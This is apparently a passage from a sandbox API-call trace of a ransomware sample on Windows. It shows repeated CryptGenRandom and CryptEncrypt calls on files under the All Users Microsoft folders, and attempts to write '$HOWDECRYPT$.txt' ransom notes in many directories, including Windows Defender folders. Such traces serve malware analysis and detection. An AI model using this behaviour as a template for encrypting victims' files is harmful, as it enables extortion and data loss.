dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.595] GetProcessHeap () returned 0x2c0000 [0145.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.595] GetProcessHeap () returned 0x2c0000 [0145.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3000228 | out: hHeap=0x2c0000) returned 1 [0145.595] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f1e8 | out: pbBuffer=0x248f1e8) returned 1 [0145.595] GetProcessHeap () returned 0x2c0000 [0145.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.595] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f1e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f1e0*=0x30) returned 1 [0145.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\generic.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.596] GetProcessHeap () returned 0x2c0000 [0145.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.596] GetProcessHeap () returned 0x2c0000 [0145.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3000130 | out: hHeap=0x2c0000) returned 1 [0145.596] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f1e0 | out: pbBuffer=0x248f1e0) returned 1 [0145.596] GetProcessHeap () returned 0x2c0000 [0145.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.596] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f1d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f1d8*=0x30) returned 1 [0145.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\fyi.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.596] GetProcessHeap () returned 0x2c0000 [0145.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.596] GetProcessHeap () returned 0x2c0000 [0145.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f652f8 | out: hHeap=0x2c0000) returned 1 [0145.596] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f1e0 | out: pbBuffer=0x248f1e0) returned 1 [0145.596] GetProcessHeap () returned 0x2c0000 [0145.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.596] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f1d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f1d8*=0x30) returned 1 [0145.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\confident.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.597] GetProcessHeap () returned 0x2c0000 [0145.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.597] GetProcessHeap () returned 0x2c0000 [0145.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3000038 | out: hHeap=0x2c0000) returned 1 [0145.597] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\activitylog\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.597] GetProcessHeap () returned 0x2c0000 [0145.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f31ae0 | out: hHeap=0x2c0000) returned 1 [0145.597] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.597] GetProcessHeap () returned 0x2c0000 [0145.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef6ee8 | out: hHeap=0x2c0000) returned 1 [0145.597] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Support\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\support\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.597] GetProcessHeap () returned 0x2c0000 [0145.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff73c8 | out: hHeap=0x2c0000) returned 1 [0145.597] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.597] GetProcessHeap () returned 0x2c0000 [0145.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff72e8 | out: hHeap=0x2c0000) returned 1 [0145.598] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.598] GetProcessHeap () returned 0x2c0000 [0145.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f65208 | out: hHeap=0x2c0000) returned 1 [0145.598] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Store\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\store\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.598] GetProcessHeap () returned 0x2c0000 [0145.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffff40 | out: hHeap=0x2c0000) returned 1 [0145.598] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Service\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\service\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.598] GetProcessHeap () returned 0x2c0000 [0145.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f00038 | out: hHeap=0x2c0000) returned 1 [0145.598] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\results\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.598] GetProcessHeap () returned 0x2c0000 [0145.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2efff38 | out: hHeap=0x2c0000) returned 1 [0145.598] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\Results\\Resource\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\results\\resource\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.598] GetProcessHeap () returned 0x2c0000 [0145.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f692a8 | out: hHeap=0x2c0000) returned 1 [0145.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\scans\\history\\cachemanager\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.599] GetProcessHeap () returned 0x2c0000 [0145.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f62698 | out: hHeap=0x2c0000) returned 1 [0145.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\quarantine\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.599] GetProcessHeap () returned 0x2c0000 [0145.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f319f8 | out: hHeap=0x2c0000) returned 1 [0145.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\localcopy\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.599] GetProcessHeap () returned 0x2c0000 [0145.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f31910 | out: hHeap=0x2c0000) returned 1 [0145.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.599] GetProcessHeap () returned 0x2c0000 [0145.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fffe48 | out: hHeap=0x2c0000) returned 1 [0145.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.600] GetProcessHeap () returned 0x2c0000 [0145.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f03d80 | out: hHeap=0x2c0000) returned 1 [0145.600] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\updates\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.600] GetProcessHeap () returned 0x2c0000 [0145.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f62590 | out: hHeap=0x2c0000) returned 1 [0145.600] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\backup\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.600] GetProcessHeap () returned 0x2c0000 [0145.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f62488 | out: hHeap=0x2c0000) returned 1 [0145.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\VISIO\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\visio\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.601] GetProcessHeap () returned 0x2c0000 [0145.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffbf70 | out: hHeap=0x2c0000) returned 1 [0145.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Vault\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\vault\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.601] GetProcessHeap () returned 0x2c0000 [0145.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffbeb8 | out: hHeap=0x2c0000) returned 1 [0145.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.601] GetProcessHeap () returned 0x2c0000 [0145.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fef250 | out: hHeap=0x2c0000) returned 1 [0145.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.602] GetProcessHeap () returned 0x2c0000 [0145.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2effe38 | out: hHeap=0x2c0000) returned 1 [0145.602] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f188 | out: pbBuffer=0x248f188) returned 1 [0145.602] GetProcessHeap () returned 0x2c0000 [0145.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.602] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f180*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f180*=0x30) returned 1 [0145.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.602] GetProcessHeap () returned 0x2c0000 [0145.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.602] GetProcessHeap () returned 0x2c0000 [0145.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fffd50 | out: hHeap=0x2c0000) returned 1 [0145.602] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f188 | out: pbBuffer=0x248f188) returned 1 [0145.602] GetProcessHeap () returned 0x2c0000 [0145.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.602] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f180*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f180*=0x30) returned 1 [0145.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.603] GetProcessHeap () returned 0x2c0000 [0145.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.603] GetProcessHeap () returned 0x2c0000 [0145.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fffc58 | out: hHeap=0x2c0000) returned 1 [0145.603] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f180 | out: pbBuffer=0x248f180) returned 1 [0145.603] GetProcessHeap () returned 0x2c0000 [0145.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.603] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f178*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f178*=0x30) returned 1 [0145.603] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.603] GetProcessHeap () returned 0x2c0000 [0145.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.603] GetProcessHeap () returned 0x2c0000 [0145.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fffb60 | out: hHeap=0x2c0000) returned 1 [0145.603] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f180 | out: pbBuffer=0x248f180) returned 1 [0145.603] GetProcessHeap () returned 0x2c0000 [0145.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.603] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f178*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f178*=0x30) returned 1 [0145.603] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.604] GetProcessHeap () returned 0x2c0000 [0145.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.604] GetProcessHeap () returned 0x2c0000 [0145.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fffa68 | out: hHeap=0x2c0000) returned 1 [0145.604] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f178 | out: pbBuffer=0x248f178) returned 1 [0145.604] GetProcessHeap () returned 0x2c0000 [0145.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.604] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f170*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f170*=0x30) returned 1 [0145.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.605] GetProcessHeap () returned 0x2c0000 [0145.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.605] GetProcessHeap () returned 0x2c0000 [0145.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2effa40 | out: hHeap=0x2c0000) returned 1 [0145.605] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f178 | out: pbBuffer=0x248f178) returned 1 [0145.605] GetProcessHeap () returned 0x2c0000 [0145.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.605] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f170*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f170*=0x30) returned 1 [0145.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.605] GetProcessHeap () returned 0x2c0000 [0145.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.605] GetProcessHeap () returned 0x2c0000 [0145.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eff948 | out: hHeap=0x2c0000) returned 1 [0145.605] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f170 | out: pbBuffer=0x248f170) returned 1 [0145.605] GetProcessHeap () returned 0x2c0000 [0145.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.605] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f168*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f168*=0x30) returned 1 [0145.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.606] GetProcessHeap () returned 0x2c0000 [0145.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.606] GetProcessHeap () returned 0x2c0000 [0145.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eff850 | out: hHeap=0x2c0000) returned 1 [0145.606] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f170 | out: pbBuffer=0x248f170) returned 1 [0145.606] GetProcessHeap () returned 0x2c0000 [0145.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.606] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f168*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f168*=0x30) returned 1 [0145.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.606] GetProcessHeap () returned 0x2c0000 [0145.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.607] GetProcessHeap () returned 0x2c0000 [0145.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eff758 | out: hHeap=0x2c0000) returned 1 [0145.607] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f168 | out: pbBuffer=0x248f168) returned 1 [0145.607] GetProcessHeap () returned 0x2c0000 [0145.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0145.607] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f160*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f160*=0x30) returned 1 [0145.607] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.607] GetProcessHeap () returned 0x2c0000 [0145.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0145.607] GetProcessHeap () returned 0x2c0000 [0145.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eff660 | out: hHeap=0x2c0000) returned 1 [0145.607] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f168 | out: pbBuffer=0x248f168) returned 1 [0145.607] GetProcessHeap () returned 0x2c0000 [0145.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 